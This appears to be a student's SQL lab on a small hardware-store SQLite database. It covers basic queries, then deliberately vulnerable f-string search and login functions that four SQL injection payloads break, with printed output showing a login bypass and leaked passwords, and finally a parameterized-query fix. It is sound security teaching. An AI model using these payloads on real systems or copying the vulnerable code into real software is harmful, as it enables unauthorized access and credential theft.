Nakazibwe Rose


import sqlite3

this is the set uo

conn = sqlite3.connect('nyondo_stock.db')

conn.execute('''
CREATE TABLE IF NOT EXISTS products (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    name TEXT NOT NULL,
    description TEXT,
    price REAL NOT NULL
)
''')

conn.executemany(
    'INSERT INTO products (name, description, price) VALUES (?, ?, ?)',
    [
        ('Cement (bag)', 'Portland cement 50kg bag', 35000),
        ('Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000),
        ('Paint 5L', 'Exterior wall paint white 5L', 60000),
        ('Nails 1kg', 'Common wire nails 1kg pack', 12000),
        ('Timber 2x4', 'Pine timber plank 2x4 per metre', 25000),
    ]
)

conn.commit()

rows = conn.execute('SELECT * FROM products').fetchall()
for r in rows:
    print(r)

    """THE CREATE TBLE STATEMENT
    CREATE TABLE IF NOT EXISTS products (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    name TEXT NOT NULL,
    description TEXT,
    price REAL NOT NULL
)

"""THE INSERT STATEMENT
INSERT INTO products (name, description, price) VALUES (?, ?, ?)',
    [
        ('Cement (bag)', 'Portland cement 50kg bag', 35000),
        ('Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000),
        ('Paint 5L', 'Exterior wall paint white 5L', 60000),
        ('Nails 1kg', 'Common wire nails 1kg pack', 12000),
        ('Timber 2x4', 'Pine timber plank 2x4 per metre', 25000),
    ]



# TASK 2
import sqlite3

conn = sqlite3.connect('nyondo_stock.db')
cursor = conn.cursor()
#this is query A
print("query A")
rows = cursor.execute("select * from products").fetchall()
for row in rows:
    print(row)
print()
#output1
query A
(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0)
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)


#this is query B
print("query B")
rows = cursor.execute("select name, price from products").fetchall()
for row in rows:
    print(row)
print()
#output2
query B
('Cement (bag)', 35000.0)
('Iron Sheet 3m', 110000.0)
('Paint 5L', 60000.0)
('Nails 1kg', 12000.0)
('Timber 2x4', 25000.0)


#this is query C
print("query C")
rows = cursor.execute("select * from products where id = 3").fetchall()
for row in rows:
    print(row)
print()
#output3
query C
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)


#this is query D
print("query D")
rows = cursor.execute("select * from products where name like '%sheet%'").fetchall()
for row in rows:
    print(row)
print()
#output4
query D
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)


#this is query E
print("query E")
rows = cursor.execute("select * from products order by price desc").fetchall()
for row in rows:
    print(row)
print()
#output5
query E
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)

#this is query F
print("query F")
rows = cursor.execute("select * from products  order by price desc limit 2").fetchall()
for row in rows:
    print(row)
print()
#output6
query F
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)

#this is query G
print("query G")
cursor.execute("update products set price = 38000 where id = 1")
conn.commit()
rows = cursor.execute("select * from products where id = 1").fetchall()
for row in rows:
    print(row)
print()
#output7
query G
(1, 'Cement (bag)', 'Portland cement 50kg bag', 38000.0)



#TASK3
import sqlite3

conn = sqlite3.connect('nyondo_stock.db')

def search_product(name):
    query = f"SELECT * FROM products WHERE name LIKE '%{name}%'"
    print(f"Query: {query}")
    rows = conn.execute(query).fetchall()
    print(f"Result: {rows}\n")
    return rows

def login(username, password):
    query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    print(f"Query: {query}")
    row = conn.execute(query).fetchone()
    print(f"Result: {row}\n")
    return row
search_product("' OR 1=1--")

# Attack 1 - Dump all products
search_product("' OR 1=1--")

# Attack 2 - Login bypass with no password
login("admin'--", "anything")

# Attack 3 - Always true login
login("' OR '1'='1", "' OR '1'='1")

# Attack 4 - UNION attack
search_product("' UNION SELECT id, username, password, role FROM users--")


#the output1
Query: SELECT * FROM products WHERE name LIKE '%' OR 1=1--%'
Result: [(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)]

Query: SELECT * FROM products WHERE name LIKE '%' OR 1=1--%'
Result: [(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)]

Query: SELECT * FROM users WHERE username='admin'--' AND password='anything'
Result: (1, 'admin', 'admin123', 'admin')

Query: SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1'
Result: (1, 'admin', 'admin123', 'admin')

Query: SELECT * FROM products WHERE name LIKE '%' UNION SELECT id, username, password, role FROM users--%'
Result: [(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (1, 'admin', 'admin123', 'admin'), (2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (2, 'fatuma', 'pass456', 'attendant'), (3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (3, 'wasswa', 'pass789', 'manager'), (4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)]


Attack 1 worked because the attacker changed the search so the database thought every product matched, so it showed all the products.
Attack 2 worked because the attacker removed the password check, so they could log in as admin without the real password.
Attack 3 worked because the attacker made the login condition always true, so the system let them in without a real username and password.
Attack 4 worked because the attacker tricked the search into also showing data from the users table, including login details.

#TASK4
#the secure code.
import sqlite3

conn = sqlite3.connect('nyondo_stock.db')

def search_product_safe(name):
    query = "SELECT * FROM products WHERE name LIKE ?"
    rows = conn.execute(query, (f"%{name}%",)).fetchall()
    return rows

def login_safe(username, password):
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row

# These must ALL return [] or None when you run them
print('Test 1:', search_product_safe("' OR 1=1--"))
print('Test 2:', search_product_safe("' UNION SELECT id,username,password,role FROM users--"))
print('Test 3:', login_safe("admin'--", 'anything'))
print('Test 4:', login_safe("' OR '1'='1", "' OR '1'='1"))

#the output1
 python secure.py
Test 1: []
Test 2: []
Test 3: None
Test 4: None

#The explanation.
Using ? prevents SQL injection because whatever the user types is treated as just input, not part of the SQL command. 
But with an f-string, the user input is added directly into the query, so someone can type special SQL and change what the query does. 
Parameterized queries are safer because they keep the SQL code and the user input separate.



